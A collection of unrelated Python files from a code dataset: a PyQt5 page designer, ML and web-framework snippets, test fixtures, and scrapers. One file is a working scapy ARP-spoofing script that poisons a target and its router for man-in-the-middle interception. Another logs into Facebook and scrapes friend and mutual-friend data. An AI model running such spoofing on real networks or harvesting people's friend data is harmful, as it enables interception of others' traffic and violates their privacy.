def say_hello_stream_handler(request, context):
""" Handler stream SayHello request
"""
message = ""
for item in request:
message += item.name
yield HelloResponse(message="Hello Reply: %s" % item.name)
# return HelloResponse(message="Hello Reply: %s" % message)
if __name__ == "__main__":
app.run(port=1020)
|
StarcoderdataPython
|
213672
|
<reponame>sahin88/Python_Ethical_Hacking_Tools_Vulnerability_DDOS_PassSniffer
import scapy.all as scapy
import time
import termcolor
class ConnectToTarget:
def spoof(self,router_ip,target_ip,router_mac,target_mac ):
packet1=scapy.ARP(op=2, hwdst=router_mac,pdst=router_ip, psrc=target_ip)
packet2=scapy.ARP(op=2, hwdst=target_mac,pdst=target_ip, psrc=router_ip)
scapy.send(packet1)
scapy.send(packet2)
def get_mac_address(ip_address):
broadcast_layer=scapy.Ether(dst='ff:ff:ff:ff:ff:ff')
arp_layer=scapy.ARP(pdst=ip_address)
get_mac_packet=broadcast_layer/arp_layer
answer=scapy.srp(get_mac_packet, timeout=2, verbose=False)[0]
return answer[0][1].hwsrc
def get_ip_and_route_address(self):
target_ip= input(termcolor.colored('[+] Target Ip Address:','yellow'))
router_ip= input(termcolor.colored('[+] Router Ip Address): ','blue'))
target_mac=self.get_mac_address(target_ip)
router_mac=self.get_mac_address(router_ip)
try:
while True:
self.spoof(router_ip,target_ip,router_mac,router_mac)
time.sleep(2)
except KeyboardInterrupt:
print("Closing ARP Spoofer")
connectTargetObject=ConnectToTarget()
connectTargetObject.get_ip_and_route_address()
|
StarcoderdataPython
|
5115573
|
<gh_stars>1-10
# pre allocate
mat = np.zeros([n, 3])
for i in range(n):
mat[i][0] = ...
mat[i][1] = ...
mat[i][2] = ...
|
StarcoderdataPython
|
352979
|
import theano
import theano.tensor as T
from lasagne.layers import batch_norm, DenseLayer
from lasagne.nonlinearities import sigmoid, rectify, elu, tanh, identity, softmax
from lasagne.init import GlorotUniform, Constant, HeNormal
from lasagne.layers import Conv2DLayer, Pool2DLayer, MaxPool2DLayer, MaxPool1DLayer
from lasagne.layers import get_output, get_all_params, get_output_shape
from .base import BaseLasagneClassifier
from .blocks import resnet_block
class petrillo2017_classifier(BaseLasagneClassifier):
"""
Classifier based on deep cnn architecture.
"""
def __init__(self, **kwargs):
"""
Initialisation
"""
super(self.__class__, self).__init__(**kwargs)
def _model_definition(self, net):
"""
Builds the architecture of the network
"""
he_norm = HeNormal(gain='relu')
# Input filtering and downsampling with max pooling
net = batch_norm(Conv2DLayer(net, num_filters=32, filter_size=7, pad='same', nonlinearity=rectify, W=he_norm))
net = MaxPool2DLayer(net, 2)
net = batch_norm(Conv2DLayer(net, num_filters=64, filter_size=3, pad='same', nonlinearity=rectify, W=he_norm))
net = MaxPool2DLayer(net, 2)
net = batch_norm(Conv2DLayer(net, num_filters=128, filter_size=3, pad='same', nonlinearity=rectify, W=he_norm))
net = batch_norm(Conv2DLayer(net, num_filters=128, filter_size=3, pad='same', nonlinearity=rectify, W=he_norm))
net = batch_norm(DenseLayer(net, num_units=1024, nonlinearity=rectify, W=he_norm))
net = batch_norm(DenseLayer(net, num_units=1024, nonlinearity=rectify, W=he_norm))
# Pooling
#net = MaxPool1DLayer(net, 1)
return net
|
StarcoderdataPython
|
1862265
|
#!/usr/bin/env python3
# -*- coding:utf8 -*-
import functools
import random
import sys
from PyQt5.QtCore import (QByteArray, QDataStream, QFile, QFileInfo,
QIODevice, QPoint, QPointF, QRectF, Qt)
from PyQt5.QtWidgets import (QApplication, QDialog,
QDialogButtonBox, QFileDialog, QFontComboBox,
QGraphicsItem, QGraphicsPixmapItem,
QGraphicsScene, QGraphicsTextItem, QGraphicsView, QGridLayout,
QHBoxLayout, QLabel, QMenu, QMessageBox,QPushButton, QSpinBox,
QStyle, QTextEdit, QVBoxLayout)
from PyQt5.QtGui import QFont,QCursor,QFontMetrics,QTransform,QPainter,QPen,QPixmap,QColor
from PyQt5.QtPrintSupport import QPrinter,QPrintDialog
MAC = True
try:
from PyQt5.QtGui import qt_mac_set_native_menubar
except ImportError:
MAC = False
PageSize = (595, 842) # A4 in points
# PageSize = (612, 792) # US Letter in points
PointSize = 10
MagicNumber = 0x70616765
FileVersion = 1
Dirty = False
class TextItemDlg(QDialog):
def __init__(self, item=None, position=None, scene=None, parent=None):
super(TextItemDlg, self).__init__(parent)
self.item = item
self.position = position
self.scene = scene
self.editor = QTextEdit()
self.editor.setAcceptRichText(False)
self.editor.setTabChangesFocus(True)
editorLabel = QLabel("&Text:")
editorLabel.setBuddy(self.editor)
self.fontComboBox = QFontComboBox()
self.fontComboBox.setCurrentFont(QFont("Times", PointSize))
fontLabel = QLabel("&Font:")
fontLabel.setBuddy(self.fontComboBox)
self.fontSpinBox = QSpinBox()
self.fontSpinBox.setAlignment(Qt.AlignRight|Qt.AlignVCenter)
self.fontSpinBox.setRange(6, 280)
self.fontSpinBox.setValue(PointSize)
fontSizeLabel = QLabel("&Size:")
fontSizeLabel.setBuddy(self.fontSpinBox)
self.buttonBox = QDialogButtonBox(QDialogButtonBox.Ok|
QDialogButtonBox.Cancel)
self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(False)
if self.item is not None:
self.editor.setPlainText(self.item.toPlainText())
self.fontComboBox.setCurrentFont(self.item.font())
self.fontSpinBox.setValue(self.item.font().pointSize())
layout = QGridLayout()
layout.addWidget(editorLabel, 0, 0)
layout.addWidget(self.editor, 1, 0, 1, 6)
layout.addWidget(fontLabel, 2, 0)
layout.addWidget(self.fontComboBox, 2, 1, 1, 2)
layout.addWidget(fontSizeLabel, 2, 3)
layout.addWidget(self.fontSpinBox, 2, 4, 1, 2)
layout.addWidget(self.buttonBox, 3, 0, 1, 6)
self.setLayout(layout)
self.fontComboBox.currentFontChanged.connect(self.updateUi)
self.fontSpinBox.valueChanged.connect(self.updateUi)
self.editor.textChanged.connect(self.updateUi)
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
self.setWindowTitle("Page Designer - {0} Text Item".format(
"Add" if self.item is None else "Edit"))
self.updateUi()
def updateUi(self):
font = self.fontComboBox.currentFont()
font.setPointSize(self.fontSpinBox.value())
# void QFont::setPointSize(int pointSize)
self.editor.document().setDefaultFont(font)
# .document(): This property holds the underlying document of the text editor.
self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(
bool(self.editor.toPlainText()))
def accept(self):
if self.item is None:
self.item = TextItem("", self.position, self.scene)
font = self.fontComboBox.currentFont()
font.setPointSize(self.fontSpinBox.value())
self.item.setFont(font)
self.item.setPlainText(self.editor.toPlainText())
self.item.update()
# Schedules a redraw of the area covered by rect in this item.
# You can call this function whenever your item needs to be redrawn, such as if it changes appearance or size.
global Dirty
Dirty = True
QDialog.accept(self)
class TextItem(QGraphicsTextItem):
def __init__(self, text, position, scene,
font=QFont("Times", PointSize), matrix=QTransform()):
super(TextItem, self).__init__(text)
self.setFlags(QGraphicsItem.ItemIsSelectable|
QGraphicsItem.ItemIsMovable)
self.setFont(font)
self.setPos(position)
self.setTransform(matrix)
scene.clearSelection()
scene.addItem(self)
self.setSelected(True)
global Dirty
Dirty = True
def parentWidget(self):
return self.scene().views()[0]
def itemChange(self, change, variant):
if change != QGraphicsItem.ItemSelectedChange:
global Dirty
Dirty = True
return QGraphicsTextItem.itemChange(self, change, variant)
def mouseDoubleClickEvent(self, event):
dialog = TextItemDlg(self, self.parentWidget()) # parentWidget()是做这个用的,因为双击后调用不能用在自己作为父容器
dialog.exec_()
class GraphicsPixmapItem(QGraphicsPixmapItem): #add by yangrongdong
def __init__(self,pixmap):
super(GraphicsPixmapItem, self).__init__(pixmap)
class BoxItem(QGraphicsItem):
def __init__(self, position, scene, style=Qt.SolidLine,
rect=None, matrix=QTransform()):
# 需要的参数为 矩形大小、样式、变换、位置和放置对象
# QTransform() :Constructs an identity matrix. 可接受一个矩阵,TF对象或者一些点
super(BoxItem, self).__init__()
self.setFlags(QGraphicsItem.ItemIsSelectable|
QGraphicsItem.ItemIsMovable|
QGraphicsItem.ItemIsFocusable) # 可选择、可移动、可集中焦点
if rect is None:
rect = QRectF(-10 * PointSize, -PointSize, 20 * PointSize,
2 * PointSize) # 提供一个默认的矩形
self.rect = rect
self.style = style
self.setPos(position)
self.setTransform(matrix)
scene.clearSelection() # [slot] void QGraphicsScene::clearSelection() Clears the current selection.
scene.addItem(self) # 添加项目并且选中并且高亮(添加的主题是scene)
self.setSelected(True) #If selected is true and this item is selectable, this item is selected; otherwise, it is unselected.
self.setFocus() #Gives keyboard input focus to this item. void QGraphicsItem::setFocus(Qt::FocusReason focusReason = Qt::OtherFocusReason)
# The focusReason argument will be passed into any focus event generated by this function;
global Dirty
Dirty = True # 设置Dirty为Ture,标记更改
def parentWidget(self):
return self.scene().views()[0]
# Returns a list of all the views that display this scene.
# QView.scene() Returns a pointer to the scene that is currently visualized in the view.
def boundingRect(self):
return self.rect.adjusted(-2, -2, 2, 2)
# 返回和提供一个外边框值,如果没有给予参数传递过来,那么这会生成一个默认的扁平框
def paint(self, painter, option, widget):
pen = QPen(self.style)
pen.setColor(Qt.black)
pen.setWidth(1)
if option.state & QStyle.State_Selected:
pen.setColor(Qt.blue)
painter.setPen(pen)
painter.drawRect(self.rect)
def itemChange(self, change, variant):
if change != QGraphicsItem.ItemSelectedChange:
global Dirty
Dirty = True
return QGraphicsItem.itemChange(self, change, variant)
def contextMenuEvent(self, event):
wrapped = []
menu = QMenu(self.parentWidget())
for text, param in (
("&Solid", Qt.SolidLine),
("&Dashed", Qt.DashLine),
("D&otted", Qt.DotLine),
("D&ashDotted", Qt.DashDotLine),
("DashDo&tDotted", Qt.DashDotDotLine)):
wrapper = functools.partial(self.setStyle, param) # 不像直接用setPenStyle() 因为还要处理更新显示的问题和设置dirty问题,做成参数传递进去
# 此处self.setStyle不需要加括号,第二个为参数,直接传递就行。
wrapped.append(wrapper)
menu.addAction(text, wrapper)
menu.exec_(event.screenPos()) # screenPos\GlobalPos全局的位置\windowPos 可能因为窗口移动而改变
# 3 QPointQMouseEvent::pos();//返回相对这个widget的位置
# 4 QPointQWidget::pos();//这个属性获得的是当前目前控件在父窗口中的位置
# QMouseEvent::screenPos()和QPoint QMouseEvent::globalPos() 值相同,但是类型更高精度的QPointF,其实某些组件也有globalPosF返回QPoint
def setStyle(self, style):
self.style = style
self.update()
global Dirty
Dirty = True
def keyPressEvent(self, event):
# ?????????????????????????/为什么没效果?????????????????????????????
factor = PointSize / 4 # 移动精度
changed = False
if event.modifiers() & Qt.ShiftModifier:
if event.key() == Qt.Key_Left:
self.rect.setRight(self.rect.right() - factor)
# void QRect::setRight(int x) Sets the right edge of the rectangle to the given x coordinate
# May change the width, but will never change the left edge of the rectangle.
# moveRight() Moves the rectangle horizontally, leaving the rectangle's right edge at the given x coordinate. The rectangle's size is unchanged.
changed = True
elif event.key() == Qt.Key_Right:
self.rect.setRight(self.rect.right() + factor)
changed = True
elif event.key() == Qt.Key_Up:
self.rect.setBottom(self.rect.bottom() - factor)
changed = True
elif event.key() == Qt.Key_Down:
self.rect.setBottom(self.rect.bottom() + factor)
changed = True
if changed:
self.update()
global Dirty
Dirty = True
else:
QGraphicsItem.keyPressEvent(self, event)
class GraphicsView(QGraphicsView):
def __init__(self, parent=None):
super(GraphicsView, self).__init__(parent)
self.setDragMode(QGraphicsView.RubberBandDrag)
# A rubber band will appear. Dragging the mouse will set the rubber band geometry,
# and all items covered by the rubber band are selected. This mode is disabled for non-interactive views.
self.setRenderHint(QPainter.Antialiasing)
self.setRenderHint(QPainter.TextAntialiasing)
def wheelEvent(self, event):
#factor = 1.41 ** (-event.delta() / 240.0)
factor = event.angleDelta().y()/120.0
if event.angleDelta().y()/120.0 > 0:
factor=2
else:
factor=0.5
self.scale(factor, factor)
# Scales the current view transformation by (sx, sy).
class MainForm(QDialog):
def __init__(self, parent=None):
super(MainForm, self).__init__(parent)
self.filename = ""
self.copiedItem = QByteArray()
self.pasteOffset = 5
self.prevPoint = QPoint()
self.addOffset = 5
self.borders = []
self.printer = QPrinter(QPrinter.HighResolution)
# enum QPrinter::PrinterMode
# HighRes是一个高分辨率模式,是PrinterMode组成
self.printer.setPageSize(QPrinter.A4)
self.view = GraphicsView()
self.scene = QGraphicsScene(self)
self.scene.setSceneRect(0, 0, PageSize[0], PageSize[1])
self.addBorders()
self.view.setScene(self.scene)
# 不用写 view.show?
self.wrapped = [] # Needed to keep wrappers alive
buttonLayout = QVBoxLayout()
for text, slot in (
("Add &Text", self.addText),
("Add &Box", self.addBox),
("Add Pi&xmap", self.addPixmap),
("&Align", None),
("&Copy", self.copy),
("C&ut", self.cut),
("&Paste", self.paste),
("&Delete...", self.delete),
("&Rotate", self.rotate),
("Pri&nt...", self.print_),
("&Open...", self.open),
("&Save", self.save),
("&Quit", self.accept)):
button = QPushButton(text)
if not MAC:
button.setFocusPolicy(Qt.NoFocus)
if slot is not None:
button.clicked.connect(slot)
if text == "&Align":
menu = QMenu(self)
for text, arg in (
("Align &Left", Qt.AlignLeft),
("Align &Right", Qt.AlignRight),
("Align &Top", Qt.AlignTop),
("Align &Bottom", Qt.AlignBottom)):
wrapper = functools.partial(self.setAlignment, arg)
# ?????
self.wrapped.append(wrapper)
menu.addAction(text, wrapper)
button.setMenu(menu)
if text == "Pri&nt...":
buttonLayout.addStretch(5)
if text == "&Quit":
buttonLayout.addStretch(1)
buttonLayout.addWidget(button)
buttonLayout.addStretch()
layout = QHBoxLayout()
layout.addWidget(self.view, 1)
# QBoxLayout::addWidget(QWidget *widget, int stretch = 0, Qt::Alignment alignment = Qt::Alignment())
layout.addLayout(buttonLayout)
self.setLayout(layout)
fm = QFontMetrics(self.font())
self.resize(self.scene.width() + fm.width(" Delete... ") + 50,
self.scene.height() + 50)
self.setWindowTitle("Page Designer 页面设计器")
def addBorders(self):
'''添加出血框和打印边界框,对scene进行操作同时添加到self.borders这一列表中'''
self.borders = []
rect = QRectF(0, 0, PageSize[0], PageSize[1])
self.borders.append(self.scene.addRect(rect, Qt.black)) # addRect px,py,x,y,QPen,QBrush or QRectF,QPen,QBrush
# scene.addRect(): Return QGraphicsRectItem;Inherits: QGraphicsItem
margin = 5.25 * PointSize
self.borders.append(self.scene.addRect(
rect.adjusted(margin, margin, -margin, -margin),
Qt.red))
def removeBorders(self):
'''从列表删除边框,从scene删除边框'''
while self.borders:
item = self.borders.pop()
self.scene.removeItem(item) #Removes the item item and all its children from the scene. 接受参数为QGraphicsItem
del item
def reject(self):
self.accept()
def accept(self):
self.offerSave()
QDialog.accept(self) # 完成提示保存之后传递给QDialog的accept命令,之前几章好像讲过为什么要直接调用QDialog这个父类,这里的MWindow是QDialog
def offerSave(self):
'''根据Dirty判断是否更改,如果更改则弹出保存对话框,调用save()函数进行保存。'''
if (Dirty and QMessageBox.question(self,
"Page Designer - Unsaved Changes",
"Save unsaved changes?",
QMessageBox.Yes|QMessageBox.No) ==
QMessageBox.Yes):
self.save()
def position(self):
point = self.mapFromGlobal(QCursor.pos()) # mFG接受一个QPoint参数,包含两个元素的元组 此函数转换QPoint到map,返回依旧是QPoint
# Translates the global screen coordinate pos to widget coordinates.
if not self.view.geometry().contains(point): #??????????????????????????????????????????????
coord = random.randint(36, 144)
point = QPoint(coord, coord)
else:
if point == self.prevPoint:
point += QPoint(self.addOffset, self.addOffset)
self.addOffset += 5
else:
self.addOffset = 5
self.prevPoint = point
return self.view.mapToScene(point) # 将Widght的点左边转换成为Scene坐标,调用对象是QGView
def addText(self):
dialog = TextItemDlg(position=self.position(),
scene=self.scene, parent=self)
dialog.exec_()
def addBox(self):
BoxItem(self.position(), self.scene)
def addPixmap(self):
path = (QFileInfo(self.filename).path()
if self.filename else ".") # 获取filename定义的正确地址,或者返回此程序根目录
fname,filetype = QFileDialog.getOpenFileName(self,
"Page Designer - Add Pixmap", path,
"Pixmap Files (*.bmp *.jpg *.png *.xpm)")
if not fname:
return
self.createPixmapItem(QPixmap(fname), self.position()) # 插入时候要将地址传递给QPixmap生成对象,并且还需要位置参数
def createPixmapItem(self, pixmap, position, matrix=QTransform()): # 传递参数为:文件、位置和变换
item = GraphicsPixmapItem(pixmap) # 第一步,将QPixmap转换成为GPItem
item.setFlags(QGraphicsItem.ItemIsSelectable|
QGraphicsItem.ItemIsMovable) # 设置一些属性
item.setPos(position) # 设置位置
item.setTransform(matrix) # 将变换参数应用到GPItem之中
self.scene.clearSelection() # 选择清空
self.scene.addItem(item) # 添加项目
item.setSelected(True) # 并且选中
global Dirty
Dirty = True # 全局变量Dirty设置为True
return item # 为什么需要返回这个???
def selectedItem(self): # 默认的scene选择的是一个列表,如果只有一个则返回index=0的item,如果多选则不返回任何一个
items = self.scene.selectedItems()
if len(items) == 1:
return items[0]
return None
def copy(self):
item = self.selectedItem()
if item is None:
return
self.copiedItem.clear()
self.pasteOffset = 5
stream = QDataStream(self.copiedItem, QIODevice.WriteOnly)
self.writeItemToStream(stream, item) # 写入到流
def cut(self):
item = self.selectedItem()
if item is None:
return
self.copy()
self.scene.removeItem(item)
del item
def paste(self):
if self.copiedItem.isEmpty():
return
stream = QDataStream(self.copiedItem, QIODevice.ReadOnly)
self.readItemFromStream(stream, self.pasteOffset) # 从数据流中读入信息,并且输出到self.pasteOffset中
self.pasteOffset += 5
def setAlignment(self, alignment):
# Items are returned in arbitrary order
items = self.scene.selectedItems()
if len(items) <= 1:
return
# Gather coordinate data
leftXs, rightXs, topYs, bottomYs = [], [], [], []
for item in items:
rect = item.sceneBoundingRect()
# Returns the bounding rect of this item in scene coordinates : Return QRectF
leftXs.append(rect.x())
rightXs.append(rect.x() + rect.width())
topYs.append(rect.y())
bottomYs.append(rect.y() + rect.height())
# Perform alignment
if alignment == Qt.AlignLeft:
xAlignment = min(leftXs)
for i, item in enumerate(items):
item.moveBy(xAlignment - leftXs[i], 0)
# void QGraphicsItem::moveBy(qreal dx, qreal dy)
# Moves the item by dx points horizontally, and dy point vertically.
elif alignment == Qt.AlignRight:
xAlignment = max(rightXs)
for i, item in enumerate(items):
item.moveBy(xAlignment - rightXs[i], 0)
elif alignment == Qt.AlignTop:
yAlignment = min(topYs)
for i, item in enumerate(items):
item.moveBy(0, yAlignment - topYs[i])
elif alignment == Qt.AlignBottom:
yAlignment = max(bottomYs)
for i, item in enumerate(items):
item.moveBy(0, yAlignment - bottomYs[i])
global Dirty
Dirty = True
def rotate(self):
for item in self.scene.selectedItems():
item.setRotation(item.rotation()+30)
def delete(self): # 从基本scene属性中选取选择的多个,弹出对话框,如果允许,则迭代进行删除,并且设置Dirty为True
items = self.scene.selectedItems()
if (len(items) and QMessageBox.question(self,
"Page Designer - Delete",
"Delete {0} item{1}?".format(len(items),
"s" if len(items) != 1 else ""),
QMessageBox.Yes|QMessageBox.No) ==
QMessageBox.Yes):
while items:
item = items.pop()
self.scene.removeItem(item)
del item
global Dirty
Dirty = True
def print_(self):
# dialog = QPrintDialog(self.printer) # 在此已经设置好了self.printer 也就是QPrinter对象,QPDlg直接传递回了Printer对象,之后重新由
# # printer对象声称心的QPrinter就可以继续使用在这句话中设置好的参数了。
# if dialog.exec_():
painter = QPainter(self.printer)
painter.setRenderHint(QPainter.Antialiasing)
painter.setRenderHint(QPainter.TextAntialiasing)
self.scene.clearSelection()
self.removeBorders()
self.scene.render(painter)
# [void] Renders the source rect from scene into target, using painter. This function is useful for capturing the contents
# of the scene onto a paint device, such as a QImage (e.g., to take a screenshot), or for printing with QPrinter. For example:
self.addBorders()
def open(self):
self.offerSave()
path = (QFileInfo(self.filename).path()
if self.filename else ".")
fname,filetype = QFileDialog.getOpenFileName(self,
"Page Designer - Open", path,
"cmPage Designer Files (*.cmpd *.pgd *.cmd)")
if not fname:
return
self.filename = fname
fh = None
try:
fh = QFile(self.filename)
if not fh.open(QIODevice.ReadOnly):
raise IOError(str(fh.errorString()))
items = self.scene.items() # 返回所有的QGitem List形式
while items:
item = items.pop() # 从列表中删除一个,从scene中删除一个,迭代到全部删除
self.scene.removeItem(item)
del item
self.addBorders()
stream = QDataStream(fh)
stream.setVersion(QDataStream.Qt_5_7)
magic = stream.readInt32()
if magic != MagicNumber:
raise IOError("not a valid .cmpd file")
fileVersion = stream.readInt16()
if fileVersion != FileVersion:
raise IOError("unrecognised .cmpd file version")
while not fh.atEnd():
self.readItemFromStream(stream)
except IOError as e:
QMessageBox.warning(self, "Page Designer -- Open Error",
"Failed to open {0}: {1}".format(self.filename, e))
finally:
if fh is not None:
fh.close()
global Dirty
Dirty = False
def save(self):
if not self.filename:
path = "."
fname,filetype = QFileDialog.getSaveFileName(self,
"Page Designer - Save As", path,
"cmPage Designer Files (*.cmpd *.pgd *.cmd)")
if not fname:
return
self.filename = fname
fh = None
try:
fh = QFile(self.filename)
if not fh.open(QIODevice.WriteOnly):
raise IOError(str(fh.errorString()))
self.scene.clearSelection()
stream = QDataStream(fh)
stream.setVersion(QDataStream.Qt_5_7)
stream.writeInt32(MagicNumber)
stream.writeInt16(FileVersion)
for item in self.scene.items():
self.writeItemToStream(stream, item)
except IOError as e:
QMessageBox.warning(self, "Page Designer -- Save Error",
"Failed to save {0}: {1}".format(self.filename, e))
finally:
if fh is not None:
fh.close()
global Dirty
Dirty = False
def readItemFromStream(self, stream, offset=0):
type = ""
position = QPointF()
matrix = QTransform()
rotateangle=0#add by yangrongdong
type=stream.readQString()
stream >> position >> matrix
if offset:
position += QPointF(offset, offset)
if type == "Text":
text = ""
font = QFont()
text=stream.readQString()
stream >> font
rotateangle=stream.readFloat()
tx=TextItem(text, position, self.scene, font, matrix)
tx.setRotation(rotateangle)
elif type == "Box":
rect = QRectF()
stream >> rect
style = Qt.PenStyle(stream.readInt16())
rotateangle=stream.readFloat()
bx=BoxItem(position, self.scene, style, rect, matrix)
bx.setRotation(rotateangle)
elif type == "Pixmap":
pixmap = QPixmap()
stream >> pixmap
rotateangle=stream.readFloat()
px=self.createPixmapItem(pixmap, position, matrix)
px.setRotation(rotateangle)
def writeItemToStream(self, stream, item):
if isinstance(item, TextItem):
stream.writeQString("Text")
stream<<item.pos()<< item.transform()
stream.writeQString(item.toPlainText())
stream<< item.font()
stream.writeFloat(item.rotation())#add by yangrongdong
elif isinstance(item, GraphicsPixmapItem):
stream.writeQString("Pixmap")
stream << item.pos() << item.transform() << item.pixmap()
stream.writeFloat(item.rotation())#add by yangrongdong
elif isinstance(item, BoxItem):
stream.writeQString("Box")
stream<< item.pos() << item.transform() << item.rect
stream.writeInt16(item.style)
stream.writeFloat(item.rotation())#add by yangrongdong
app = QApplication(sys.argv)
form = MainForm()
rect = QApplication.desktop().availableGeometry()
# QA.desktop(): Returns the desktop widget (also called the root window).
# .availableGeometry() QDesktopWidget::availableGeometry(const QWidget *widget) Return QRect
form.resize(int(rect.width() * 0.6), int(rect.height() * 0.9))
form.show()
app.exec_()
|
StarcoderdataPython
|
3241705
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
"""
Created on Wed May 18 07:51:28 2016
@author: ericgrimson
"""
import datetime
class Person(object):
def __init__(self, name):
"""create a person called name"""
self.name = name
self.birthday = None
self.lastName = name.split(' ')[-1]
def getLastName(self):
"""return self's last name"""
return self.lastName
def setBirthday(self,month,day,year):
"""sets self's birthday to birthDate"""
self.birthday = datetime.date(year,month,day)
def getAge(self):
"""returns self's current age in days"""
if self.birthday == None:
raise ValueError
return (datetime.date.today() - self.birthday).days
def __lt__(self, other):
"""return True if self's ame is lexicographically
less than other's name, and False otherwise"""
if self.lastName == other.lastName:
return self.name < other.name
return self.lastName < other.lastName
# other methods
def __str__(self):
"""return self's name"""
return self.name
# example usage
p1 = Person('<NAME>')
p1.setBirthday(5,14,84)
p2 = Person('<NAME>')
p2.setBirthday(3,4,83)
p3 = Person('<NAME>')
p3.setBirthday(10,28,55)
p4 = Person('<NAME>')
p5 = Person('<NAME>')
personList = [p1, p2, p3, p4]
for e in personList:
print(e)
personList.sort()
print()
for e in personList:
print(e)
|
StarcoderdataPython
|
6630866
|
def max_num_in_list(items):
tot = max(items)
return tot
print(max_num_in_list([1, 2, -8, 0]))
#
# def max_num_in_list(list):
# max = list[0]
# for a in list:
# if a > max:
# max = a
# return max
#
#
# print(max_num_in_list([1, 2, -8, 0]))
"""
Write a Python program to get the largest number from a list. Go to the editor
"""
|
StarcoderdataPython
|
4820366
|
<filename>wagtail_localize/test/wagtail_hooks.py
from wagtail.contrib.modeladmin.options import (
ModelAdmin,
ModelAdminGroup,
modeladmin_register,
)
from wagtail_localize.modeladmin.options import TranslatableModelAdmin
from .models import NonTranslatableModel, TestModel, TestPage
class TestPageAdmin(TranslatableModelAdmin):
model = TestPage
class TestModelAdmin(TranslatableModelAdmin):
model = TestModel
inspect_view_enabled = True
class NonTranslatableModelAdmin(ModelAdmin):
model = NonTranslatableModel
@modeladmin_register
class ModelAdminAdmin(ModelAdminGroup):
items = (TestPageAdmin, TestModelAdmin, NonTranslatableModelAdmin)
menu_label = "Model Admin"
|
StarcoderdataPython
|
1604806
|
<reponame>Tejas-Nanaware/Learning-OpenCV<filename>haar cascades/own haar cascade/get files.py
import urllib.request
import cv2
import numpy as np
import os
print("Hi")
def store_raw_images():
print("getting url")
# neg_images_link = 'http://image-net.org/api/text/imagenet.synset.geturls?wnid=n00007846'
# neg_images_link = 'http://image-net.org/api/text/imagenet.synset.geturls?wnid=n07942152'
neg_images_link = 'http://image-net.org/api/text/imagenet.synset.geturls?wnid=n00523513'
print("Got URL")
neg_image_urls = urllib.request.urlopen(neg_images_link).read().decode()
pic_num = 1
print(pic_num)
if not os.path.exists('neg'):
os.makedirs('neg')
print("made dir")
for i in neg_image_urls.split('\n'):
try:
print(str(pic_num) + "\t" + i)
urllib.request.urlretrieve(i, "neg/"+str(pic_num)+".jpg")
img = cv2.imread("neg/"+str(pic_num)+".jpg",cv2.IMREAD_GRAYSCALE)
# should be larger than samples / pos pic (so we can place our image on it)
resized_image = cv2.resize(img, (500, 500))
cv2.imwrite("neg/"+str(pic_num)+".jpg",resized_image)
pic_num += 1
except Exception as e:
print(str(e))
store_raw_images()
|
StarcoderdataPython
|
382623
|
import os
import pytest
from pathlib import Path
import logging
from balsa import Balsa
from awsimple import __application_name__, __author__, is_mock, use_moto_mock_env_var, S3Access
from test_awsimple import test_awsimple_str, temp_dir, cache_dir
mock_env_var = os.environ.get(use_moto_mock_env_var)
if mock_env_var is None:
os.environ[use_moto_mock_env_var] = "1"
# if using non-local pytest, create the credentials and config files dynamically
aws_credentials_and_config_dir = Path(Path.home(), ".aws")
aws_credentials_file = Path(aws_credentials_and_config_dir, "credentials")
aws_config_file = Path(aws_credentials_and_config_dir, "config")
if is_mock():
if not aws_credentials_and_config_dir.exists():
aws_credentials_and_config_dir.mkdir(parents=True, exist_ok=True)
if not aws_credentials_file.exists():
credential_strings = [
"[default]\naws_access_key_id=AAAAAAAAAAAAAAAAAAAA\naws_secret_access_key=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
f"[{test_awsimple_str}]\naws_access_key_id=AAAAAAAAAAAAAAAAAAAA\naws_secret_access_key=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
]
aws_credentials_file.write_text("\n".join(credential_strings))
if not aws_config_file.exists():
config_strings = ["[profile default]\nregion=us-west-2", f"[profile {test_awsimple_str}]\nregion=us-west-2"]
aws_config_file.write_text("\n".join(config_strings))
class TestAWSimpleLoggingHandler(logging.Handler):
def emit(self, record):
print(record.getMessage())
assert False
@pytest.fixture(scope="session", autouse=True)
def session_fixture():
temp_dir.mkdir(parents=True, exist_ok=True)
cache_dir.mkdir(parents=True, exist_ok=True)
balsa = Balsa(__application_name__, __author__, log_directory=Path("log"), delete_existing_log_files=True, verbose=False)
# add handler that will throw an assert on ERROR or greater
test_handler = TestAWSimpleLoggingHandler()
test_handler.setLevel(logging.ERROR)
logging.getLogger().addHandler(test_handler)
balsa.init_logger()
print(f"{is_mock()=}")
@pytest.fixture(scope="module")
def s3_access():
_s3_access = S3Access(profile_name=test_awsimple_str, bucket_name=test_awsimple_str, cache_dir=cache_dir)
return _s3_access
|
StarcoderdataPython
|
1858617
|
import time
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0
from selenium.webdriver.support import expected_conditions as EC # available since 2.26.0
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.chrome.options import Options
from selenium.common import exceptions
from datetime import datetime
from bs4 import BeautifulSoup
import pandas as pd
import numpy as np
from scipy import stats
import matplotlib.pyplot as plt
usr=input('Enter Email Id:') #enter email
pwd=input('Enter Password:') #enter password
driver = webdriver.Chrome("C:\\Users\\shawn\\Desktop\\Programming\\Facebook\\chromedriver.exe") #change this path to appropriate chrome driver directory
driver.get("http://facebook.com")
username_box = driver.find_element_by_id('email')
username_box.send_keys(usr)
password_box = driver.find_element_by_id('pass')
password_box.send_keys(<PASSWORD>)
login_box = driver.find_element_by_id('loginbutton')
login_box.click()
def click_random_spot():
actions = ActionChains(driver)
actions.move_to_element_with_offset(driver.find_element_by_tag_name('body'), 0,0)
actions.move_by_offset(100, 200).click().perform()
def download_friends():
driver.get("https://m.facebook.com/me/friends")
time.sleep(5)
print('Scrolling to bottom...')
#Scroll to bottom
while driver.find_elements_by_css_selector('#m_more_friends'):
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
time.sleep(5)
def get_soup(driver):
html = driver.page_source
soup = BeautifulSoup(html, 'html.parser')
return(soup)
download_friends()
soup = get_soup(driver)
mutual_friends = soup.findAll("div", { "class" : "notice ellipsis" })
friend_names = soup.findAll("div", { "class" : "_84l2" })
mutual_friend_dict = {}
url_dict = {}
